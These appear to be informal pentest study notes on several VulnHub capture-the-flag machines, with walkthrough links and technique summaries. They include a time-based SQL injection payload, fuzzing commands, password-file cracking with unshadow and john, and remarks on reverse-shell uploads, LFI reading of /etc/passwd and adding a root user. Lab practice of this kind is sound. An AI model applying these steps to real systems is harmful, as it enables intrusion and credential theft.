nagpentest

https://www.vulnhub.com/entry/hackday-albania,167/ Walkthru: A. https://github.com/DavidBrosnan/Walkthroughs/wiki/Hackday-Albania [directory hopping using wfuzz, sql injection, sqlmap, file type restriction upload php reverse shell as jpg,  msfvenom, meterpreter, no python 2.7 or gcc, password in config.php,  mysql> prompt, outfile from  mysql, writetable passwd file, adding a root user/pwd to  passwd file ] B. http://security-geek.in/2017/02/08/vulnhub-hack-a-day-albania/ [] C. https://g0blin.co.uk/albania-vulnhub-writeup/ [ dirsearch, sqlmap  time based blind attack, why username field is susceptible to attack while password field isnt  , port forward in our  meterpreter  session ] Notes: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Walkthru C.. I note in Sqlmap that we  were  redirected to  index.php  when triggering the payload. Let's try entering the generated payload of  username= test' RLIKE SLEEP(5)-- smYE  as our username, and see why we're being redirected

https://www.vulnhub.com/?q=D0Not5top&sort=date-des&type=vm Walkthru: A. https://github.com/Hamza-Megahed/CTFs/blob/master/d0not5top/README [  burp proxy, adding hostnames to /etc/host shows following but not working for me. Not showing localhost stuff, $ dirb http://172.16.34.163/control/ -X .txt,.php,.html     + http://172.16.34.163/control/hosts.txt     127.0.0.1 localhost     127.0.0.1 D0Not5top.ctf     #127.0.0.1       MadBroAdN1n.ctf ## AD105 M0F05] B. https://adaywithtape.blogspot.com/2017/04/vulnhub-d0not5top-writeup.html [use nc cmd to get the flag and echo cmd to decode the flag, wfuzz, virtualhost, partially binary string, google language translate, curl  -header  host request, additional domains, OWSAP ZAP, exiftool, HD, hash64,] wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 192.168.56.102/FUZZ Changing the syntax just a tad to only show html 200 codes and be recursive down to 3 directories gives a clearer view of none

https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1 Walkthru: -scan shows ssh, http, smb, sql and irc ports. -tried to access smb share and copy files to target but looks like share is accessible but not writable. -couldnt find any interesting in http -ran hydra on ssh and found the pwd for togie -restricted shell but full su access. so copied shadow and passwd file to kali to crack it using john. but not completed for an hr atleast. root@localhost:~/freshly# unshadow passwd shadow > cracked.txt root@localhost:~/freshly# john cracked.txt Created directory: /root/.john so changed the root passwd hash in shadow file similar to togie. Su as root and entered the same pwd and I m root Notes:

Walkthru A. https://prasannakumar.in/infosec/vulnhub-ctf-usv-2017-writeup/ [ javascript Obfuscated    which is currently one of the best methods for protecting JavaScript code from reverse engineering.  The " var _0xbb15=" gives us a hint .  It’s in the obfuscated way. Deobfuscating using  JS Beautifier , vulnerability with https: site, decode or reverse engineer the math manually, curl to download an html page using --data (POST) request,  LFI or local file inclusion  , curl to read /etc/passwd due to LFI, wfuzz to fuzz/customize the dir structure to download, one can use wget to download the files from door and vault folders by selecting ' --no-directories ’   options so it doesn't create ten thousand directories but wget didnt stop automatically, it kept on going , may be does multiple iteration not sure , aircrack-ng, looks like a blind sql injection and we are not getting response from the SQL injection error or select statement in that case we know the sql in

Walkthru: A. https://www.mogozobo.com/?p=2848 [no open ports in initial portscan, tcpdump to listen traffic on the network, nc -nvlp 1337 to get the server connected after which additional ports enabled, long  74 character strinng that needed to be decoded using echo and xxd than mds5 unhash,  Steganography    using  Steghide  , sftp, ssh not allowed, file command, scalpel command, uncomment the  jpg extension in the   scalperl config file and ran it in an empty folder] B. https://highon.coffee/blog/the-wall-walkthrough/ [fatcat which a forensics tool used for recovering / extracting data from FAT16 images ] C. https://www.unlogic.co.uk/2016/06/02/the-wall-vulnhub-walkthrough/ [] Notes: Completed and stopped till phase 2

Walkthru: https://www.vulnhub.com/?q=zorz&sort=date-asc&type=vm Notes: PORT   STATE SERVICE VERSION 22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu)) MAC Address: 08:00:27:9A:0D:2F (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel None of Walkthrus shows getting root access so may be it is not part of the to do. Walkthrus shows 3 different ways to get shell access. I got shell by uploading the revers shell file via index and browing to /upload1 folder. It shows upload3 but not upload1. upload3 doesnt allow anything except pictures but  gif reverse shell or xxd didnt work either. Tried to run exploit and run privchker and exploit checker but they didn't work. No gcc on se